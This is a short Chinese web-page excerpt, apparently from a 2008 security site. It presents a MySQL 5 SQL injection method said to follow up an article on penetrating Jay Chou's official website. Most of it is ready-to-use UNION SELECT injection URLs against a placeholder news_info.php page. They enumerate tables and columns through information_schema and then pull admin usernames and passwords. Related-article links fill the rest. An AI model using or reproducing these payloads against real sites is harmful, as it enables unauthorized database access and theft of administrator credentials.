 |
Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来,你看明白这个文章后也许你会发现,原来mysql5也可以像mssql一样注射。 |
遍里webbase里面的表名,找到敏感的表,如图三(0x77656262617365是webbase的十六进制编码) xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/2,1
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
|
- 2008-11-19[安全防护] 保证Windows操作系统无毒的两个..
- 2008-11-18[安全防护] Windows操作系统无毒的两个技巧
- 2008-11-13[安全防护] 化解无线网络的安全威胁
- 2008-11-11[安全防护] 巧妙解决文件无法删除的烦恼
- 2008-11-09[工具使用] BT3 + Intel 3945ABG + spoonw..
- 2008-11-04[安全防护] 让无线上网变得更加安全
- 2008-11-01[安全防护] 了解无线网安全技术规范
- 2008-10-31[安全防护] 轻松配置无线路由器
- 2008-10-29[安全防护] 导致无线网络连接频繁断线的三..
- 2008-10-18[安全防护] 社交网络存安全隐患 四招助你网..
